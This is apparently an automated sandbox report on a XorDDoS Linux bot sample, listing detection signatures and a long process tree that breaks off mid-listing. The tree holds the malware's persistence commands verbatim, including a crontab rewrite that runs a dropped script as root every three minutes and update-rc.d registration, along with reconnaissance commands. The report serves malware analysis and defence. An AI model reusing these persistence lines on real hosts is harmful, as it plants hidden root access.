Edit tour

Linux Analysis Report
TmoTjBkSXT.elf

Overview

General Information

Sample name:	TmoTjBkSXT.elf renamed because original name is a hash value
Original sample name:	e40d4ba6f6aee3acd39faf65f471894a.elf
Analysis ID:	1417668
MD5:	e40d4ba6f6aee3acd39faf65f471894a
SHA1:	7de3d9b9905cc4fde29d37ca73e2ffcf7bbb0eab
SHA256:	0e817a2325c215997de15851152a66924874739eeff5da4b434e5d36c83a76eb
Tags:	32elfintel
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XorDDoS Bot

Drops files in suspicious directories

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Drops files with innocent-looking names

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

PID-file does not contain an ASCII number

Reads CPU information from /proc indicative of miner or evasive malware

Reads system information from the proc file system

Sample has stripped symbol table

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Yara signature match

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417668
Start date and time:	2024-03-30 00:00:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	TmoTjBkSXT.elf renamed because original name is a hash value
Original Sample Name:	e40d4ba6f6aee3acd39faf65f471894a.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/21@17/0

Runtime Messages

Command:	/tmp/TmoTjBkSXT.elf
PID:	6220
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

TmoTjBkSXT.elf (PID: 6220, Parent: 6135, MD5: e40d4ba6f6aee3acd39faf65f471894a) Arguments: /tmp/TmoTjBkSXT.elf

TmoTjBkSXT.elf New Fork (PID: 6221, Parent: 6220)

TmoTjBkSXT.elf New Fork (PID: 6222, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6223, Parent: 6222)

TmoTjBkSXT.elf New Fork (PID: 6224, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6225, Parent: 6224)

update-rc.d (PID: 6225, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d TmoTjBkSXT.elf defaults

update-rc.d New Fork (PID: 6231, Parent: 6225)

systemctl (PID: 6231, Parent: 6225, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

TmoTjBkSXT.elf New Fork (PID: 6226, Parent: 6221)

sh (PID: 6226, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6227, Parent: 6226)

sed (PID: 6227, Parent: 6226, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

TmoTjBkSXT.elf New Fork (PID: 6253, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6254, Parent: 6253)

wrvgghkqdd (PID: 6254, Parent: 6253, MD5: b46c27dafdcdb69e28d3b3dfb37e3fa6) Arguments: /usr/bin/wrvgghkqdd "route -n" 6221

wrvgghkqdd New Fork (PID: 6255, Parent: 6254)

TmoTjBkSXT.elf New Fork (PID: 6256, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6257, Parent: 6256)

wrvgghkqdd (PID: 6257, Parent: 6256, MD5: b46c27dafdcdb69e28d3b3dfb37e3fa6) Arguments: /usr/bin/wrvgghkqdd who 6221

wrvgghkqdd New Fork (PID: 6260, Parent: 6257)

TmoTjBkSXT.elf New Fork (PID: 6258, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6259, Parent: 6258)

wrvgghkqdd (PID: 6259, Parent: 6258, MD5: b46c27dafdcdb69e28d3b3dfb37e3fa6) Arguments: /usr/bin/wrvgghkqdd "echo \"find\"" 6221

wrvgghkqdd New Fork (PID: 6263, Parent: 6259)

TmoTjBkSXT.elf New Fork (PID: 6261, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6262, Parent: 6261)

wrvgghkqdd (PID: 6262, Parent: 6261, MD5: b46c27dafdcdb69e28d3b3dfb37e3fa6) Arguments: /usr/bin/wrvgghkqdd su 6221

wrvgghkqdd New Fork (PID: 6266, Parent: 6262)

TmoTjBkSXT.elf New Fork (PID: 6264, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6265, Parent: 6264)

wrvgghkqdd (PID: 6265, Parent: 6264, MD5: b46c27dafdcdb69e28d3b3dfb37e3fa6) Arguments: /usr/bin/wrvgghkqdd "cat resolv.conf" 6221

wrvgghkqdd New Fork (PID: 6267, Parent: 6265)

TmoTjBkSXT.elf New Fork (PID: 6271, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6272, Parent: 6271)

mqnheeruxi (PID: 6272, Parent: 6271, MD5: d819564cad3ba79779bfc8b9e3bbd10a) Arguments: /usr/bin/mqnheeruxi ls 6221

mqnheeruxi New Fork (PID: 6273, Parent: 6272)

TmoTjBkSXT.elf New Fork (PID: 6274, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6275, Parent: 6274)

mqnheeruxi (PID: 6275, Parent: 6274, MD5: d819564cad3ba79779bfc8b9e3bbd10a) Arguments: /usr/bin/mqnheeruxi ls 6221

mqnheeruxi New Fork (PID: 6278, Parent: 6275)

TmoTjBkSXT.elf New Fork (PID: 6276, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6277, Parent: 6276)

mqnheeruxi (PID: 6277, Parent: 6276, MD5: d819564cad3ba79779bfc8b9e3bbd10a) Arguments: /usr/bin/mqnheeruxi "grep \"A\"" 6221

mqnheeruxi New Fork (PID: 6282, Parent: 6277)

TmoTjBkSXT.elf New Fork (PID: 6279, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6280, Parent: 6279)

mqnheeruxi (PID: 6280, Parent: 6279, MD5: d819564cad3ba79779bfc8b9e3bbd10a) Arguments: /usr/bin/mqnheeruxi "ps -ef" 6221

mqnheeruxi New Fork (PID: 6284, Parent: 6280)

TmoTjBkSXT.elf New Fork (PID: 6281, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6283, Parent: 6281)

mqnheeruxi (PID: 6283, Parent: 6281, MD5: d819564cad3ba79779bfc8b9e3bbd10a) Arguments: /usr/bin/mqnheeruxi "grep \"A\"" 6221

mqnheeruxi New Fork (PID: 6285, Parent: 6283)

TmoTjBkSXT.elf New Fork (PID: 6288, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6289, Parent: 6288)

rfjhcudkoa (PID: 6289, Parent: 6288, MD5: 485f8e4db36662caef27f8c74fd55014) Arguments: /usr/bin/rfjhcudkoa "echo \"find\"" 6221

rfjhcudkoa New Fork (PID: 6290, Parent: 6289)

TmoTjBkSXT.elf New Fork (PID: 6291, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6292, Parent: 6291)

rfjhcudkoa (PID: 6292, Parent: 6291, MD5: 485f8e4db36662caef27f8c74fd55014) Arguments: /usr/bin/rfjhcudkoa pwd 6221

rfjhcudkoa New Fork (PID: 6295, Parent: 6292)

TmoTjBkSXT.elf New Fork (PID: 6293, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6294, Parent: 6293)

rfjhcudkoa (PID: 6294, Parent: 6293, MD5: 485f8e4db36662caef27f8c74fd55014) Arguments: /usr/bin/rfjhcudkoa gnome-terminal 6221

rfjhcudkoa New Fork (PID: 6298, Parent: 6294)

TmoTjBkSXT.elf New Fork (PID: 6296, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6297, Parent: 6296)

rfjhcudkoa (PID: 6297, Parent: 6296, MD5: 485f8e4db36662caef27f8c74fd55014) Arguments: /usr/bin/rfjhcudkoa "netstat -antop" 6221

rfjhcudkoa New Fork (PID: 6301, Parent: 6297)

TmoTjBkSXT.elf New Fork (PID: 6299, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6300, Parent: 6299)

rfjhcudkoa (PID: 6300, Parent: 6299, MD5: 485f8e4db36662caef27f8c74fd55014) Arguments: /usr/bin/rfjhcudkoa uptime 6221

rfjhcudkoa New Fork (PID: 6302, Parent: 6300)

TmoTjBkSXT.elf New Fork (PID: 6325, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6326, Parent: 6325)

eygutfitxp (PID: 6326, Parent: 6325, MD5: c5560a18cb6f7c944aafd759dbdc1f8e) Arguments: /usr/bin/eygutfitxp ls 6221

eygutfitxp New Fork (PID: 6327, Parent: 6326)

TmoTjBkSXT.elf New Fork (PID: 6328, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6329, Parent: 6328)

eygutfitxp (PID: 6329, Parent: 6328, MD5: c5560a18cb6f7c944aafd759dbdc1f8e) Arguments: /usr/bin/eygutfitxp uptime 6221

eygutfitxp New Fork (PID: 6332, Parent: 6329)

TmoTjBkSXT.elf New Fork (PID: 6330, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6331, Parent: 6330)

eygutfitxp (PID: 6331, Parent: 6330, MD5: c5560a18cb6f7c944aafd759dbdc1f8e) Arguments: /usr/bin/eygutfitxp "netstat -an" 6221

eygutfitxp New Fork (PID: 6335, Parent: 6331)

TmoTjBkSXT.elf New Fork (PID: 6333, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6334, Parent: 6333)

eygutfitxp (PID: 6334, Parent: 6333, MD5: c5560a18cb6f7c944aafd759dbdc1f8e) Arguments: /usr/bin/eygutfitxp "grep \"A\"" 6221

eygutfitxp New Fork (PID: 6338, Parent: 6334)

TmoTjBkSXT.elf New Fork (PID: 6336, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6337, Parent: 6336)

eygutfitxp (PID: 6337, Parent: 6336, MD5: c5560a18cb6f7c944aafd759dbdc1f8e) Arguments: /usr/bin/eygutfitxp who 6221

eygutfitxp New Fork (PID: 6339, Parent: 6337)

TmoTjBkSXT.elf New Fork (PID: 6342, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6343, Parent: 6342)

ljhaidbadz (PID: 6343, Parent: 6342, MD5: ccdd3c4a20b8ca7a95ac155639ef8c22) Arguments: /usr/bin/ljhaidbadz "netstat -antop" 6221

ljhaidbadz New Fork (PID: 6344, Parent: 6343)

TmoTjBkSXT.elf New Fork (PID: 6345, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6346, Parent: 6345)

ljhaidbadz (PID: 6346, Parent: 6345, MD5: ccdd3c4a20b8ca7a95ac155639ef8c22) Arguments: /usr/bin/ljhaidbadz "netstat -antop" 6221

ljhaidbadz New Fork (PID: 6347, Parent: 6346)

TmoTjBkSXT.elf New Fork (PID: 6348, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6349, Parent: 6348)

ljhaidbadz (PID: 6349, Parent: 6348, MD5: ccdd3c4a20b8ca7a95ac155639ef8c22) Arguments: /usr/bin/ljhaidbadz "ls -la" 6221

ljhaidbadz New Fork (PID: 6352, Parent: 6349)

TmoTjBkSXT.elf New Fork (PID: 6350, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6351, Parent: 6350)

ljhaidbadz (PID: 6351, Parent: 6350, MD5: ccdd3c4a20b8ca7a95ac155639ef8c22) Arguments: /usr/bin/ljhaidbadz "cat resolv.conf" 6221

ljhaidbadz New Fork (PID: 6355, Parent: 6351)

TmoTjBkSXT.elf New Fork (PID: 6353, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6354, Parent: 6353)

ljhaidbadz (PID: 6354, Parent: 6353, MD5: ccdd3c4a20b8ca7a95ac155639ef8c22) Arguments: /usr/bin/ljhaidbadz ls 6221

ljhaidbadz New Fork (PID: 6356, Parent: 6354)

TmoTjBkSXT.elf New Fork (PID: 6359, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6360, Parent: 6359)

ogbruyreel (PID: 6360, Parent: 6359, MD5: d44c955c88d57d2d4648924f0f170c84) Arguments: /usr/bin/ogbruyreel ifconfig 6221

ogbruyreel New Fork (PID: 6361, Parent: 6360)

TmoTjBkSXT.elf New Fork (PID: 6364, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6365, Parent: 6364)

ogbruyreel (PID: 6365, Parent: 6364, MD5: d44c955c88d57d2d4648924f0f170c84) Arguments: /usr/bin/ogbruyreel gnome-terminal 6221

ogbruyreel New Fork (PID: 6368, Parent: 6365)

TmoTjBkSXT.elf New Fork (PID: 6366, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6367, Parent: 6366)

ogbruyreel (PID: 6367, Parent: 6366, MD5: d44c955c88d57d2d4648924f0f170c84) Arguments: /usr/bin/ogbruyreel "grep \"A\"" 6221

ogbruyreel New Fork (PID: 6371, Parent: 6367)

TmoTjBkSXT.elf New Fork (PID: 6369, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6370, Parent: 6369)

ogbruyreel (PID: 6370, Parent: 6369, MD5: d44c955c88d57d2d4648924f0f170c84) Arguments: /usr/bin/ogbruyreel uptime 6221

ogbruyreel New Fork (PID: 6374, Parent: 6370)

TmoTjBkSXT.elf New Fork (PID: 6372, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6373, Parent: 6372)

ogbruyreel (PID: 6373, Parent: 6372, MD5: d44c955c88d57d2d4648924f0f170c84) Arguments: /usr/bin/ogbruyreel whoami 6221

ogbruyreel New Fork (PID: 6375, Parent: 6373)

TmoTjBkSXT.elf New Fork (PID: 6378, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6379, Parent: 6378)

xilfqxoepi (PID: 6379, Parent: 6378, MD5: 82e2169758546db0029f9a84da52c335) Arguments: /usr/bin/xilfqxoepi "ps -ef" 6221

xilfqxoepi New Fork (PID: 6380, Parent: 6379)

TmoTjBkSXT.elf New Fork (PID: 6381, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6382, Parent: 6381)

xilfqxoepi (PID: 6382, Parent: 6381, MD5: 82e2169758546db0029f9a84da52c335) Arguments: /usr/bin/xilfqxoepi "ifconfig eth0" 6221

xilfqxoepi New Fork (PID: 6385, Parent: 6382)

TmoTjBkSXT.elf New Fork (PID: 6383, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6384, Parent: 6383)

xilfqxoepi (PID: 6384, Parent: 6383, MD5: 82e2169758546db0029f9a84da52c335) Arguments: /usr/bin/xilfqxoepi who 6221

xilfqxoepi New Fork (PID: 6388, Parent: 6384)

TmoTjBkSXT.elf New Fork (PID: 6386, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6387, Parent: 6386)

xilfqxoepi (PID: 6387, Parent: 6386, MD5: 82e2169758546db0029f9a84da52c335) Arguments: /usr/bin/xilfqxoepi "ls -la" 6221

xilfqxoepi New Fork (PID: 6391, Parent: 6387)

TmoTjBkSXT.elf New Fork (PID: 6389, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6390, Parent: 6389)

xilfqxoepi (PID: 6390, Parent: 6389, MD5: 82e2169758546db0029f9a84da52c335) Arguments: /usr/bin/xilfqxoepi "netstat -an" 6221

xilfqxoepi New Fork (PID: 6392, Parent: 6390)

TmoTjBkSXT.elf New Fork (PID: 6395, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6396, Parent: 6395)

ucawyxmhdv (PID: 6396, Parent: 6395, MD5: a0c739b76d925c3beeb3ccba01b8e61d) Arguments: /usr/bin/ucawyxmhdv uptime 6221

ucawyxmhdv New Fork (PID: 6397, Parent: 6396)

TmoTjBkSXT.elf New Fork (PID: 6398, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6399, Parent: 6398)

ucawyxmhdv (PID: 6399, Parent: 6398, MD5: a0c739b76d925c3beeb3ccba01b8e61d) Arguments: /usr/bin/ucawyxmhdv top 6221

ucawyxmhdv New Fork (PID: 6400, Parent: 6399)

TmoTjBkSXT.elf New Fork (PID: 6401, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6402, Parent: 6401)

ucawyxmhdv (PID: 6402, Parent: 6401, MD5: a0c739b76d925c3beeb3ccba01b8e61d) Arguments: /usr/bin/ucawyxmhdv "ifconfig eth0" 6221

ucawyxmhdv New Fork (PID: 6405, Parent: 6402)

TmoTjBkSXT.elf New Fork (PID: 6403, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6404, Parent: 6403)

ucawyxmhdv (PID: 6404, Parent: 6403, MD5: a0c739b76d925c3beeb3ccba01b8e61d) Arguments: /usr/bin/ucawyxmhdv ls 6221

ucawyxmhdv New Fork (PID: 6408, Parent: 6404)

TmoTjBkSXT.elf New Fork (PID: 6406, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6407, Parent: 6406)

ucawyxmhdv (PID: 6407, Parent: 6406, MD5: a0c739b76d925c3beeb3ccba01b8e61d) Arguments: /usr/bin/ucawyxmhdv who 6221

ucawyxmhdv New Fork (PID: 6409, Parent: 6407)

TmoTjBkSXT.elf New Fork (PID: 6412, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6413, Parent: 6412)

flfoijfhrh (PID: 6413, Parent: 6412, MD5: fd2e647d032ea2f380c1715f0ddb4582) Arguments: /usr/bin/flfoijfhrh ls 6221

flfoijfhrh New Fork (PID: 6414, Parent: 6413)

TmoTjBkSXT.elf New Fork (PID: 6415, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6416, Parent: 6415)

flfoijfhrh (PID: 6416, Parent: 6415, MD5: fd2e647d032ea2f380c1715f0ddb4582) Arguments: /usr/bin/flfoijfhrh "cat resolv.conf" 6221

flfoijfhrh New Fork (PID: 6417, Parent: 6416)

TmoTjBkSXT.elf New Fork (PID: 6418, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6419, Parent: 6418)

flfoijfhrh (PID: 6419, Parent: 6418, MD5: fd2e647d032ea2f380c1715f0ddb4582) Arguments: /usr/bin/flfoijfhrh uptime 6221

flfoijfhrh New Fork (PID: 6423, Parent: 6419)

TmoTjBkSXT.elf New Fork (PID: 6420, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6421, Parent: 6420)

flfoijfhrh (PID: 6421, Parent: 6420, MD5: fd2e647d032ea2f380c1715f0ddb4582) Arguments: /usr/bin/flfoijfhrh who 6221

flfoijfhrh New Fork (PID: 6425, Parent: 6421)

TmoTjBkSXT.elf New Fork (PID: 6422, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6424, Parent: 6422)

flfoijfhrh (PID: 6424, Parent: 6422, MD5: fd2e647d032ea2f380c1715f0ddb4582) Arguments: /usr/bin/flfoijfhrh "ps -ef" 6221

flfoijfhrh New Fork (PID: 6426, Parent: 6424)

TmoTjBkSXT.elf New Fork (PID: 6432, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6433, Parent: 6432)

zuuufkngmy (PID: 6433, Parent: 6432, MD5: fa9f67ee8844791d0b402596a66ed3aa) Arguments: /usr/bin/zuuufkngmy pwd 6221

zuuufkngmy New Fork (PID: 6434, Parent: 6433)

TmoTjBkSXT.elf New Fork (PID: 6435, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6436, Parent: 6435)

zuuufkngmy (PID: 6436, Parent: 6435, MD5: fa9f67ee8844791d0b402596a66ed3aa) Arguments: /usr/bin/zuuufkngmy "ls -la" 6221

zuuufkngmy New Fork (PID: 6439, Parent: 6436)

TmoTjBkSXT.elf New Fork (PID: 6437, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6438, Parent: 6437)

zuuufkngmy (PID: 6438, Parent: 6437, MD5: fa9f67ee8844791d0b402596a66ed3aa) Arguments: /usr/bin/zuuufkngmy id 6221

zuuufkngmy New Fork (PID: 6442, Parent: 6438)

TmoTjBkSXT.elf New Fork (PID: 6440, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6441, Parent: 6440)

zuuufkngmy (PID: 6441, Parent: 6440, MD5: fa9f67ee8844791d0b402596a66ed3aa) Arguments: /usr/bin/zuuufkngmy "echo \"find\"" 6221

zuuufkngmy New Fork (PID: 6445, Parent: 6441)

TmoTjBkSXT.elf New Fork (PID: 6443, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6444, Parent: 6443)

zuuufkngmy (PID: 6444, Parent: 6443, MD5: fa9f67ee8844791d0b402596a66ed3aa) Arguments: /usr/bin/zuuufkngmy "echo \"find\"" 6221

zuuufkngmy New Fork (PID: 6446, Parent: 6444)

TmoTjBkSXT.elf New Fork (PID: 6449, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6450, Parent: 6449)

pmvkvnihjm (PID: 6450, Parent: 6449, MD5: 3a610f09da7280c7d83a04a51d4e7144) Arguments: /usr/bin/pmvkvnihjm "route -n" 6221

pmvkvnihjm New Fork (PID: 6451, Parent: 6450)

TmoTjBkSXT.elf New Fork (PID: 6452, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6453, Parent: 6452)

pmvkvnihjm (PID: 6453, Parent: 6452, MD5: 3a610f09da7280c7d83a04a51d4e7144) Arguments: /usr/bin/pmvkvnihjm "echo \"find\"" 6221

pmvkvnihjm New Fork (PID: 6454, Parent: 6453)

TmoTjBkSXT.elf New Fork (PID: 6455, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6456, Parent: 6455)

pmvkvnihjm (PID: 6456, Parent: 6455, MD5: 3a610f09da7280c7d83a04a51d4e7144) Arguments: /usr/bin/pmvkvnihjm "sleep 1" 6221

pmvkvnihjm New Fork (PID: 6461, Parent: 6456)

TmoTjBkSXT.elf New Fork (PID: 6457, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6458, Parent: 6457)

pmvkvnihjm (PID: 6458, Parent: 6457, MD5: 3a610f09da7280c7d83a04a51d4e7144) Arguments: /usr/bin/pmvkvnihjm pwd 6221

pmvkvnihjm New Fork (PID: 6462, Parent: 6458)

TmoTjBkSXT.elf New Fork (PID: 6459, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6460, Parent: 6459)

pmvkvnihjm (PID: 6460, Parent: 6459, MD5: 3a610f09da7280c7d83a04a51d4e7144) Arguments: /usr/bin/pmvkvnihjm ifconfig 6221

pmvkvnihjm New Fork (PID: 6463, Parent: 6460)

TmoTjBkSXT.elf New Fork (PID: 6466, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6467, Parent: 6466)

vwtoogupfm (PID: 6467, Parent: 6466, MD5: 3e698362dcff12549aaff5cd24bee294) Arguments: /usr/bin/vwtoogupfm ls 6221

vwtoogupfm New Fork (PID: 6468, Parent: 6467)

TmoTjBkSXT.elf New Fork (PID: 6469, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6470, Parent: 6469)

vwtoogupfm (PID: 6470, Parent: 6469, MD5: 3e698362dcff12549aaff5cd24bee294) Arguments: /usr/bin/vwtoogupfm "route -n" 6221

vwtoogupfm New Fork (PID: 6473, Parent: 6470)

TmoTjBkSXT.elf New Fork (PID: 6471, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6472, Parent: 6471)

vwtoogupfm (PID: 6472, Parent: 6471, MD5: 3e698362dcff12549aaff5cd24bee294) Arguments: /usr/bin/vwtoogupfm "ps -ef" 6221

vwtoogupfm New Fork (PID: 6476, Parent: 6472)

TmoTjBkSXT.elf New Fork (PID: 6474, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6475, Parent: 6474)

vwtoogupfm (PID: 6475, Parent: 6474, MD5: 3e698362dcff12549aaff5cd24bee294) Arguments: /usr/bin/vwtoogupfm "ifconfig eth0" 6221

vwtoogupfm New Fork (PID: 6479, Parent: 6475)

TmoTjBkSXT.elf New Fork (PID: 6477, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6478, Parent: 6477)

vwtoogupfm (PID: 6478, Parent: 6477, MD5: 3e698362dcff12549aaff5cd24bee294) Arguments: /usr/bin/vwtoogupfm uptime 6221

vwtoogupfm New Fork (PID: 6480, Parent: 6478)

TmoTjBkSXT.elf New Fork (PID: 6483, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6484, Parent: 6483)

zygafieftp (PID: 6484, Parent: 6483, MD5: cf8cb8d9bc20bd48c2a9db69aa9cd54f) Arguments: /usr/bin/zygafieftp "ls -la" 6221

zygafieftp New Fork (PID: 6485, Parent: 6484)

TmoTjBkSXT.elf New Fork (PID: 6486, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6487, Parent: 6486)

zygafieftp (PID: 6487, Parent: 6486, MD5: cf8cb8d9bc20bd48c2a9db69aa9cd54f) Arguments: /usr/bin/zygafieftp "sleep 1" 6221

zygafieftp New Fork (PID: 6490, Parent: 6487)

TmoTjBkSXT.elf New Fork (PID: 6488, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6489, Parent: 6488)

zygafieftp (PID: 6489, Parent: 6488, MD5: cf8cb8d9bc20bd48c2a9db69aa9cd54f) Arguments: /usr/bin/zygafieftp ls 6221

zygafieftp New Fork (PID: 6495, Parent: 6489)

TmoTjBkSXT.elf New Fork (PID: 6491, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6492, Parent: 6491)

zygafieftp (PID: 6492, Parent: 6491, MD5: cf8cb8d9bc20bd48c2a9db69aa9cd54f) Arguments: /usr/bin/zygafieftp "netstat -antop" 6221

zygafieftp New Fork (PID: 6496, Parent: 6492)

TmoTjBkSXT.elf New Fork (PID: 6493, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6494, Parent: 6493)

zygafieftp (PID: 6494, Parent: 6493, MD5: cf8cb8d9bc20bd48c2a9db69aa9cd54f) Arguments: /usr/bin/zygafieftp whoami 6221

zygafieftp New Fork (PID: 6497, Parent: 6494)

TmoTjBkSXT.elf New Fork (PID: 6500, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6501, Parent: 6500)

ybavzvdbws (PID: 6501, Parent: 6500, MD5: 62624e51356ed9ff5514215be98a5c72) Arguments: /usr/bin/ybavzvdbws "sleep 1" 6221

ybavzvdbws New Fork (PID: 6502, Parent: 6501)

TmoTjBkSXT.elf New Fork (PID: 6503, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6504, Parent: 6503)

ybavzvdbws (PID: 6504, Parent: 6503, MD5: 62624e51356ed9ff5514215be98a5c72) Arguments: /usr/bin/ybavzvdbws "echo \"find\"" 6221

ybavzvdbws New Fork (PID: 6505, Parent: 6504)

TmoTjBkSXT.elf New Fork (PID: 6506, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6507, Parent: 6506)

ybavzvdbws (PID: 6507, Parent: 6506, MD5: 62624e51356ed9ff5514215be98a5c72) Arguments: /usr/bin/ybavzvdbws whoami 6221

ybavzvdbws New Fork (PID: 6510, Parent: 6507)

TmoTjBkSXT.elf New Fork (PID: 6508, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6509, Parent: 6508)

ybavzvdbws (PID: 6509, Parent: 6508, MD5: 62624e51356ed9ff5514215be98a5c72) Arguments: /usr/bin/ybavzvdbws whoami 6221

ybavzvdbws New Fork (PID: 6513, Parent: 6509)

TmoTjBkSXT.elf New Fork (PID: 6511, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6512, Parent: 6511)

ybavzvdbws (PID: 6512, Parent: 6511, MD5: 62624e51356ed9ff5514215be98a5c72) Arguments: /usr/bin/ybavzvdbws "grep \"A\"" 6221

ybavzvdbws New Fork (PID: 6514, Parent: 6512)

TmoTjBkSXT.elf New Fork (PID: 6518, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6519, Parent: 6518)

piqqogcjxo (PID: 6519, Parent: 6518, MD5: c2b293b1339080e35e219828f8c8bfea) Arguments: /usr/bin/piqqogcjxo sh 6221

piqqogcjxo New Fork (PID: 6520, Parent: 6519)

TmoTjBkSXT.elf New Fork (PID: 6521, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6522, Parent: 6521)

piqqogcjxo (PID: 6522, Parent: 6521, MD5: c2b293b1339080e35e219828f8c8bfea) Arguments: /usr/bin/piqqogcjxo "netstat -an" 6221

piqqogcjxo New Fork (PID: 6525, Parent: 6522)

TmoTjBkSXT.elf New Fork (PID: 6523, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6524, Parent: 6523)

piqqogcjxo (PID: 6524, Parent: 6523, MD5: c2b293b1339080e35e219828f8c8bfea) Arguments: /usr/bin/piqqogcjxo bash 6221

piqqogcjxo New Fork (PID: 6530, Parent: 6524)

TmoTjBkSXT.elf New Fork (PID: 6526, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6527, Parent: 6526)

